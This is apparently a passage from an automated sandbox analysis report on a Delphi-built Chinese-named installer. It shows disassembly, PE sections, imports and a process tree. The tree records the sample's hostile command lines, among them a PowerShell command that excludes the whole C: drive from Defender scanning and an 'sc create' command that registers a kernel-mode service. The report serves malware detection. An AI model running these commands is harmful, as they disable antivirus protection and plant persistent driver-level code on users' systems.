                          File Version Minor:1
                          Subsystem Version Major:6
                          Subsystem Version Minor:1
                          Import Hash:40ab50289f7ef5fae60801f88d4541fc
                          Instruction
                          push ebp
                          mov ebp, esp
                          add esp, FFFFFFA4h
                          push ebx
                          push esi
                          push edi
                          xor eax, eax
                          mov dword ptr [ebp-3Ch], eax
                          mov dword ptr [ebp-40h], eax
                          mov dword ptr [ebp-5Ch], eax
                          mov dword ptr [ebp-30h], eax
                          mov dword ptr [ebp-38h], eax
                          mov dword ptr [ebp-34h], eax
                          mov dword ptr [ebp-2Ch], eax
                          mov dword ptr [ebp-28h], eax
                          mov dword ptr [ebp-14h], eax
                          mov eax, 004A2EBCh
                          call 00007FE018B19205h
                          xor eax, eax
                          push ebp
                          push 004A8AC1h
                          push dword ptr fs:[eax]
                          mov dword ptr fs:[eax], esp
                          xor edx, edx
                          push ebp
                          push 004A8A7Bh
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          mov eax, dword ptr [004B0634h]
                          call 00007FE018BAAB8Bh
                          call 00007FE018BAA6DEh
                          lea edx, dword ptr [ebp-14h]
                          xor eax, eax
                          call 00007FE018BA53B8h
                          mov edx, dword ptr [ebp-14h]
                          mov eax, 004B41F4h
                          call 00007FE018B132B3h
                          push 00000002h
                          push 00000000h
                          push 00000001h
                          mov ecx, dword ptr [004B41F4h]
                          mov dl, 01h
                          mov eax, dword ptr [0049CD14h]
                          call 00007FE018BA66E3h
                          mov dword ptr [004B41F8h], eax
                          xor edx, edx
                          push ebp
                          push 004A8A27h
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          call 00007FE018BAAC13h
                          mov dword ptr [004B4200h], eax
                          mov eax, dword ptr [004B4200h]
                          cmp dword ptr [eax+0Ch], 01h
                          jne 00007FE018BB18FAh
                          mov eax, dword ptr [004B4200h]
                          mov edx, 00000028h
                          call 00007FE018BA6FD8h
                          mov edx, dword ptr [004B4200h]
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .rsrc | 0xcb000 | 0x11000 | 0x11000 | 0298257a2fdc6a5af46f0d4f3dd0d7d8 | False | 0.1877154181985294 | data | 3.7229458291165596 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                          RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                          RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                          RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                          RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                          RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                          RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                          RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                          RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                          RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                          RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                          RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                          RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                          RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                          RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                          RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                          RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                          RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                          RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                          RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                          RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                          RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                          RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                          RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                          RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                          RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                          RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1818181818181819
                          RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                          RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2776203966005666
                          RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                          DLL | Import
                          kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                          comctl32.dll | InitCommonControls
                          user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                          oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                          advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                          Name | Ordinal | Address
                          __dbk_fcall_wrapper | 2 | 0x40fc10
                          dbkFCallWrapperAddr | 1 | 0x4b063c
                          Language of compilation system | Country where language is spoken
                          English | United States
                          No network behavior found

                          Target ID:0
                          Start time:22:43:17
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe"
                          Imagebase:0xa10000
                          File size:9'897'435 bytes
                          MD5 hash:1892CF920FFE70868B967804D9222B14
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:22:43:17
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe"
                          Imagebase:0x590000
                          File size:3'366'912 bytes
                          MD5 hash:F71908CEAB1076D5D4250CBFCB02E6B2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          Target ID:2
                          Start time:22:43:18
                          Start date:24/12/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:22:43:18
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:22:43:21
                          Start date:24/12/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff693ab0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:5
                          Start time:22:43:26
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT
                          Imagebase:0xa10000
                          File size:9'897'435 bytes
                          MD5 hash:1892CF920FFE70868B967804D9222B14
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:false

                          Target ID:6
                          Start time:22:43:26
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$302A2,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT
                          Imagebase:0x9e0000
                          File size:3'366'912 bytes
                          MD5 hash:F71908CEAB1076D5D4250CBFCB02E6B2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Antivirus matches:
                          • Detection: 1%, Virustotal, Browse
                          Reputation:low
                          Has exited:true

                          Target ID:7
                          Start time:22:43:29
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:22:43:29
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:22:43:29
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:10
                          Start time:22:43:29
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                          Imagebase:0x6d0000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 0%, ReversingLabs
                          • Detection: 0%, Virustotal, Browse
                          Has exited:true

                          Target ID:11
                          Start time:22:43:30
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:12
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                          Imagebase:0x6d0000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:13
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:14
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:15
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:16
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:17
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:18
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:19
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:20
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:21
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:22
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:23
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:24
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:25
                          Start time:22:43:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:27
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:28
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:29
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:30
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:31
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:32
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:33
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:34
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:35
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:36
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:37
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:38
